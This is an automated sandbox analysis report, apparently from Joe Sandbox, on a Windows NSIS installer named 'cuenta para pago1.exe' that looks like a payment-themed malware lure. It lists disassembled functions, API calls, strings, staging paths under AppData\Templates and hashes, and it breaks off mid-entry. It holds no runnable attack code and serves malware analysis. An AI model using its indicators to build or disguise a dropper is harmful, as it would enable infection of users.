                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: &B
                                                                                      • API String ID: 3282139019-3208460036
                                                                                      • Opcode ID: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                                      • Instruction ID: 95f6c8bb4d7d19f6e547f96282e94f2ad2b423d9adc133d8208fe863fff8d237
                                                                                      • Opcode Fuzzy Hash: 9a0603423a15e753b59f3bba80cdb29a1d953a93d90d9a1e173928d4099cede9
                                                                                      • Instruction Fuzzy Hash: 6CC1A071A04204BBDB316F61ED85E2B3AA8FB95705F40053EF601B11F1C779A892DB2E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403863 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 287 403863-40387b call 4063f4 290 40387d-403888 GetUserDefaultUILanguage call 405f61 287->290 291 40388f-4038c6 call 405ee7 287->291 295 40388d 290->295 297 4038c8-4038d9 call 405ee7 291->297 298 4038de-4038e4 lstrcatW 291->298 296 4038e9-403912 call 403b39 call 405ad6 295->296 304 4039a4-4039ac call 405ad6 296->304 305 403918-40391d 296->305 297->298 298->296 310 4039ba-4039df LoadImageW 304->310 311 4039ae-4039b5 call 40603c 304->311 305->304 306 403923-40393d call 405ee7 305->306 312 403942-40394b 306->312 314 403a60-403a68 call 40140b 310->314 315 4039e1-403a11 RegisterClassW 310->315 311->310 312->304 316 40394d-403951 312->316 329 403a72-403a7d call 403b39 314->329 330 403a6a-403a6d 314->330 319 403a17-403a5b SystemParametersInfoW CreateWindowExW 315->319 320 403b2f 315->320 317 403963-40396f lstrlenW 316->317 318 403953-403960 call 4059fb 316->318 324 403971-40397f lstrcmpiW 317->324 325 403997-40399f call 4059ce call 40601a 317->325 318->317 319->314 323 403b31-403b38 320->323 324->325 328 403981-40398b GetFileAttributesW 324->328 325->304 332 403991-403992 call 405a1a 328->332 333 40398d-40398f 328->333 339 403a83-403a9d ShowWindow call 406384 329->339 340 403b06-403b07 call 40524c 329->340 330->323 332->325 333->325 333->332 347 403aa9-403abb GetClassInfoW 339->347 348 403a9f-403aa4 call 406384 339->348 343 403b0c-403b0e 340->343 345 403b10-403b16 343->345 346 403b28-403b2a call 40140b 343->346 345->330 353 403b1c-403b23 call 40140b 345->353 346->320 351 403ad3-403af6 DialogBoxParamW call 40140b 347->351 352 403abd-403acd GetClassInfoW RegisterClassW 347->352 348->347 356 403afb-403b04 call 4037b3 351->356 352->351 353->330 356->323
                                                                                      APIs
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000), ref: 0040387D
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,77573420), ref: 00403964
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403982
                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                      • API String ID: 606308-2580667394
                                                                                      • Opcode ID: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                                      • Instruction ID: f2be8ff4b94e14f841e527fec55e0dfc0b13ef39e818ed8fa25aa33126975f24
                                                                                      • Opcode Fuzzy Hash: cdbcb31e795f676d20caa65ef3318a0b5d744cae9e788896206eebbc679a5327
                                                                                      • Instruction Fuzzy Hash: 6661C670644300BAD720AF669D46F3B3A6CEB84749F40457FF941B62E2D7785902CA7E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 360 402dee-402e3c GetTickCount GetModuleFileNameW call 405bef 363 402e48-402e76 call 40601a call 405a1a call 40601a GetFileSize 360->363 364 402e3e-402e43 360->364 372 402f63-402f71 call 402d8a 363->372 373 402e7c 363->373 365 403020-403024 364->365 379 402f73-402f76 372->379 380 402fc6-402fcb 372->380 375 402e81-402e98 373->375 377 402e9a 375->377 378 402e9c-402ea5 call 40320c 375->378 377->378 386 402eab-402eb2 378->386 387 402fcd-402fd5 call 402d8a 378->387 382 402f78-402f90 call 403222 call 40320c 379->382 383 402f9a-402fc4 GlobalAlloc call 403222 call 403027 379->383 380->365 382->380 410 402f92-402f98 382->410 383->380 408 402fd7-402fe8 383->408 392 402eb4-402ec8 call 405baa 386->392 393 402f2e-402f32 386->393 387->380 398 402f3c-402f42 392->398 407 402eca-402ed1 392->407 397 402f34-402f3b call 402d8a 393->397 393->398 397->398 404 402f51-402f5b 398->404 405 402f44-402f4e call 4064a5 398->405 404->375 409 402f61 404->409 405->404 407->398 413 402ed3-402eda 407->413 414 402ff0-402ff5 408->414 415 402fea 408->415 409->372 410->380 410->383 413->398 416 402edc-402ee3 413->416 417 402ff6-402ffc 414->417 415->414 416->398 418 402ee5-402eec 416->418 417->417 419 402ffe-403019 SetFilePointer call 405baa 417->419 418->398 420 402eee-402f0e 418->420 423 40301e 419->423 420->380 422 402f14-402f18 420->422 424 402f20-402f28 422->424 425 402f1a-402f1e 422->425 423->365 424->398 426 402f2a-402f2c 424->426 425->409 425->424 426->398
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cuenta para pago1.exe,00000400,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402E1B
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta para pago1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-2554257175
                                                                                      • Opcode ID: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                                                                      • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                                                      • Opcode Fuzzy Hash: 122f358f8e6717933ee25f5196e07cf05b6efbf44d0d507e84cb61a679add872
                                                                                      • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040603C Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 427 40603c-406047 428 406049-406058 427->428 429 40605a-406070 427->429 428->429 430 406076-406083 429->430 431 406288-40628e 429->431 430->431 432 406089-406090 430->432 433 406294-40629f 431->433 434 406095-4060a2 431->434 432->431 436 4062a1-4062a5 call 40601a 433->436 437 4062aa-4062ab 433->437 434->433 435 4060a8-4060b4 434->435 438 406275 435->438 439 4060ba-4060f6 435->439 436->437 441 406283-406286 438->441 442 406277-406281 438->442 443 406216-40621a 439->443 444 4060fc-406107 GetVersion 439->444 441->431 442->431 447 40621c-406220 443->447 448 40624f-406253 443->448 445 406121 444->445 446 406109-40610d 444->446 454 406128-40612f 445->454 446->445 451 40610f-406113 446->451 452 406230-40623d call 40601a 447->452 453 406222-40622e call 405f61 447->453 449 406262-406273 lstrlenW 448->449 450 406255-40625d call 40603c 448->450 449->431 450->449 451->445 457 406115-406119 451->457 461 406242-40624b 452->461 453->461 459 406131-406133 454->459 460 406134-406136 454->460 457->445 464 40611b-40611f 457->464 459->460 462 406172-406175 460->462 463 406138-40615e call 405ee7 460->463 461->449 466 40624d 461->466 468 406185-406188 462->468 469 406177-406183 GetSystemDirectoryW 462->469 475 406164-40616d call 40603c 463->475 476 4061fd-406201 463->476 464->454 470 40620e-406214 call 4062ae 466->470 473 4061f3-4061f5 468->473 474 40618a-406198 GetWindowsDirectoryW 468->474 472 4061f7-4061fb 469->472 470->449 472->470 472->476 473->472 477 40619a-4061a4 473->477 474->473 475->472 476->470 480 406203-406209 lstrcatW 476->480 482 4061a6-4061a9 477->482 483 4061be-4061d4 SHGetSpecialFolderLocation 477->483 480->470 482->483 487 4061ab-4061b2 482->487 484 4061d6-4061ed SHGetPathFromIDListW CoTaskMemFree 483->484 485 4061ef 483->485 484->472 484->485 485->473 488 4061ba-4061bc 487->488 488->472 488->483
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-1050849911
                                                                                      • Opcode ID: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                                      • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                                                      • Opcode Fuzzy Hash: b8d500f1d66d49f60ce4f806ef01b9aacec72cf8db940e2808a27d94a3ad851c
                                                                                      • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 553 401767-40178c call 402bbf call 405a45 558 401796-4017a8 call 40601a call 4059ce lstrcatW 553->558 559 40178e-401794 call 40601a 553->559 564 4017ad-4017ae call 4062ae 558->564 559->564 568 4017b3-4017b7 564->568 569 4017b9-4017c3 call 40635d 568->569 570 4017ea-4017ed 568->570 578 4017d5-4017e7 569->578 579 4017c5-4017d3 CompareFileTime 569->579 572 4017f5-401811 call 405bef 570->572 573 4017ef-4017f0 call 405bca 570->573 580 401813-401816 572->580 581 401885-4018ae call 405179 call 403027 572->581 573->572 578->570 579->578 582 401867-401871 call 405179 580->582 583 401818-401856 call 40601a * 2 call 40603c call 40601a call 40575f 580->583 595 4018b0-4018b4 581->595 596 4018b6-4018c2 SetFileTime 581->596 593 40187a-401880 582->593 583->568 615 40185c-40185d 583->615 597 402a55 593->597 595->596 599 4018c8-4018d3 CloseHandle 595->599 596->599 603 402a57-402a5b 597->603 600 4018d9-4018dc 599->600 601 402a4c-402a4f 599->601 604 4018f1-4018f4 call 40603c 600->604 605 4018de-4018ef call 40603c lstrcatW 600->605 601->597 611 4018f9-40228d call 40575f 604->611 605->611 611->603 615->593 617 40185f-401860 615->617 617->582
                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\,?,?,00000031), ref: 004017CD
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsqE113.tmp$C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\$Call
                                                                                      • API String ID: 1941528284-815548829
                                                                                      • Opcode ID: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                                                                      • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                                                      • Opcode Fuzzy Hash: 002dd4f96bdd12a9be5d665e019e1aa7de7c915f3f58c6e3467a44ba116e215f
                                                                                      • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405179 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 619 405179-40518e 620 405194-4051a5 619->620 621 405245-405249 619->621 622 4051b0-4051bc lstrlenW 620->622 623 4051a7-4051ab call 40603c 620->623 625 4051d9-4051dd 622->625 626 4051be-4051ce lstrlenW 622->626 623->622 628 4051ec-4051f0 625->628 629 4051df-4051e6 SetWindowTextW 625->629 626->621 627 4051d0-4051d4 lstrcatW 626->627 627->625 630 4051f2-405234 SendMessageW * 3 628->630 631 405236-405238 628->631 629->628 630->631 631->621 632 40523a-40523d 631->632 632->621
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                      • lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00403160), ref: 004051D4
                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll), ref: 004051E6
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4058123660.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll
                                                                                      • API String ID: 2531174081-1641174819
                                                                                      • Opcode ID: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                                      • Instruction ID: 28a23e93becb388afe58fbbf22e110c81461cbae08fd60e06f08ac54b892b673
                                                                                      • Opcode Fuzzy Hash: f0736de6b77852687f6af56d99953fc3f04ffb9a82c0cfa673b58ad5bb6d8165
                                                                                      • Instruction Fuzzy Hash: 3C218E31900158BBCB219F95DD84ADFBFB8EF55350F10807AF904B62A0C7794A518F68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
